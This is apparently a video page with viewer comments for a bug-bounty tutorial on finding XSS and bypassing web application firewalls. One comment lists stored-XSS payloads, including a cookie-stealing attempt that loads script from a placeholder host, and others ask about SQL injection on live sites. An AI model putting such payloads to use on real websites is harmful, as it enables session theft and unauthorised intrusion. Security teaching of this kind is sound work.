Bug Bounty: Best Way To Find XSS & Bypass WAF | Live Demonstration | 2024

Поделиться
HTML-код
  • Опубликовано: 9 фев 2025
  • Welcome to our latest tutorial where we dive deep into the world of cybersecurity! 🚀 In this video, you’ll learn how to identify Cross-Site Scripting (XSS) vulnerabilities and effectively bypass Web Application Firewalls (WAF).
    Portswigger XSS Cheatsheet: portswigger.ne...
    XSS Playlist: • CROSS SITE SCRIPTING
    Website: bepractical.tech
    Telegram: telegram.me/be...
    Previous Video: • Bug Bounty: Subdomain ...
    The Art Of Web Reconnaissance:
    www.udemy.com/...
    Hacking Windows with Python from Scratch: www.udemy.com/...
    The Ultimate Guide to Hunt Account Takeover:
    www.udemy.com/...

Комментарии • 52

  • @erwin166
    @erwin166 Месяц назад

    The best channel!! Excellent videos!

  • @akroidofficial
    @akroidofficial 7 месяцев назад +6

    quality content. i always prefer manual rather than automated

    • @madhavanrio3210
      @madhavanrio3210 6 месяцев назад

      yeah dude automated tools are outdated now, because of WAF or other CDNs so try mannualy, and be unique from the crowd

  • @Jamaal_Ahmed
    @Jamaal_Ahmed 8 месяцев назад +10

    Wow its amazing , please make video after i got xss what next can i do .

  • @hackerbeatss
    @hackerbeatss 18 дней назад

    Thank you

  • @digitalcivilulydighed
    @digitalcivilulydighed 25 дней назад

    10/10!

  • @nishantdalvi9470
    @nishantdalvi9470 8 месяцев назад +3

    Please make one more video in where we try bypassing WAF by inputting in equal to sign in our payload around the angular tags

  • @sir_potraheno3892
    @sir_potraheno3892 4 месяца назад

    Thx, best video about xss

  • @codecore_111
    @codecore_111 5 месяцев назад

    Bro u are a gem 💎

  • @SecureByBhavesh
    @SecureByBhavesh 8 месяцев назад +13

    Informative, Please make video on SQLi

    • @RyanGiggs-w7i
      @RyanGiggs-w7i 7 месяцев назад +2

      Maybe u check in forget paswword for sqli

  • @Jabir_AfreDy
    @Jabir_AfreDy 3 месяца назад +1

    Please teach me how to do price tempering and how to know that this sites we can do price tempering

  • @shrabanichakraborty8147
    @shrabanichakraborty8147 5 месяцев назад

    amazing . Make video on how to write bug bounty report

  • @pak8380
    @pak8380 7 месяцев назад

    beautiful bro!!!!

  • @Officialheartlessheart
    @Officialheartlessheart 8 месяцев назад

    Please make a video on "XSS finding Methodology"

  • @yasaya9139
    @yasaya9139 8 месяцев назад

    Please make a video xxe basic and next level

  • @TheCyberWarriorGuy
    @TheCyberWarriorGuy 8 месяцев назад

    Please make some tutorial on BACs !!!

  • @Coollinux-c2b
    @Coollinux-c2b 6 месяцев назад

    is the lab that you use available in docker? if yes can you share to us

  • @asshu2004
    @asshu2004 8 месяцев назад

    make some video on p1 bugs..

  • @Createrrahul1M
    @Createrrahul1M 3 месяца назад

    Bro yeah to client side per ho reha he khud ke browsers me change se kya fark padega

  • @damnn_motivation
    @damnn_motivation 7 месяцев назад

    Thanks bro

  • @im_wander
    @im_wander 8 месяцев назад

    good one

  • @studywork3779
    @studywork3779 4 месяца назад

    sir if any value is not reflected in source code what shall we do

  • @wearecrypto9286
    @wearecrypto9286 7 месяцев назад

    Hi bro i didn't under that adding attributes step by encoding can you please clear it?

  • @pratapmahato3471
    @pratapmahato3471 8 месяцев назад

    Plz make video over sqlmap on live site not on test web

    • @BePracticalTech
      @BePracticalTech  8 месяцев назад

      We already covered a lot of videos on sql injection that too on live websites. Check out our playlist: ruclips.net/p/PLrQwMS8b1fmQkMnul6q06vvZL83BuK9Ud

  • @Alpha_Aquila
    @Alpha_Aquila 8 месяцев назад +1

    Please, I'm looking for that's video where you used Ngrok to demonstrate a vulnerability, please can you direct me there

    • @BePracticalTech
      @BePracticalTech  8 месяцев назад

      Here you go: ruclips.net/video/Obu2sMfEiT4/видео.htmlfeature=shared

  • @sarthaksharma9721
    @sarthaksharma9721 5 месяцев назад

    intruder allowed by website or not? plz reply

  • @mdalifislam7319
    @mdalifislam7319 8 месяцев назад

    Wow 🎉

  • @Arben_Short
    @Arben_Short 5 месяцев назад

    how to download your wallpaper

  • @giatalexandersilaban612
    @giatalexandersilaban612 5 месяцев назад

    use this in react js broh

  • @animelover5849
    @animelover5849 8 месяцев назад

    How to use subspy pip package

  • @uttarkhandcooltech1237
    @uttarkhandcooltech1237 8 месяцев назад

    Please share your window theme

  • @ronicristian4648
    @ronicristian4648 7 месяцев назад +2

    I have a case, about xss stored, when I input:
    '-alert(1)-'
    '-alert(document.domain)-'
    '-alert(document.cookie)-'
    The 3 payloads above successfully bring up the xss popup but when I input this payload to steal cookies, why doesn't it work?
    '-src="//example/c.js"-'

    • @BePracticalTech
      @BePracticalTech  7 месяцев назад

      Maybe they have added a protection to prevent js code to read cookies

  • @im_szaby9190
    @im_szaby9190 7 месяцев назад

    how can i bypass html entity encoding

  • @khanshaheb4500
    @khanshaheb4500 8 месяцев назад

    Where is waf bypassing scenario?

  • @jvr05
    @jvr05 6 месяцев назад

    this is very basic how about where //"" all of these are being detected and blocked ???

  • @sabrirais-rb7bl
    @sabrirais-rb7bl 5 месяцев назад

    pleasse the background windows

  • @whitehatboy005
    @whitehatboy005 8 месяцев назад

    if this symbol block what can do

    • @BePracticalTech
      @BePracticalTech  8 месяцев назад +2

      Then we need to check where our given value is reflecting. Based on that, there could be other ways to execute xss

    • @AgungDimasIrawan
      @AgungDimasIrawan 5 месяцев назад

      @@BePracticalTech how, give the examples

  • @whateveritis0
    @whateveritis0 8 месяцев назад

    ❤❤❤😊

  • @parthshah7271
    @parthshah7271 6 месяцев назад

    Where can we find this particular lab ?

  • @Free.Education786
    @Free.Education786 7 месяцев назад +1

    Excellent video 📹 brother. How to find vulnerable parameters and endpoints. I found many endpoints and parameters from paramspider collector parameth arjun x8, etc, but all of them failed in sqlmap or Ghauri because they are not injectable. How to solve this crucial problem. Thanks for your help and support. 🎉❤

  • @AtulRawatpredator
    @AtulRawatpredator 8 месяцев назад

    I don’t understand how WAF is being bypassed over here.

    • @khanshaheb4500
      @khanshaheb4500 8 месяцев назад

      there is no waf bypassing in this video.

    • @AtulRawatpredator
      @AtulRawatpredator 8 месяцев назад

      @@khanshaheb4500 Why does the title say so ?

    • @goodboy8833
      @goodboy8833 8 месяцев назад

      ​@@AtulRawatpredator not here he is just referring to the context where how u can bypass one

  • @asarahamad9182
    @asarahamad9182 4 месяца назад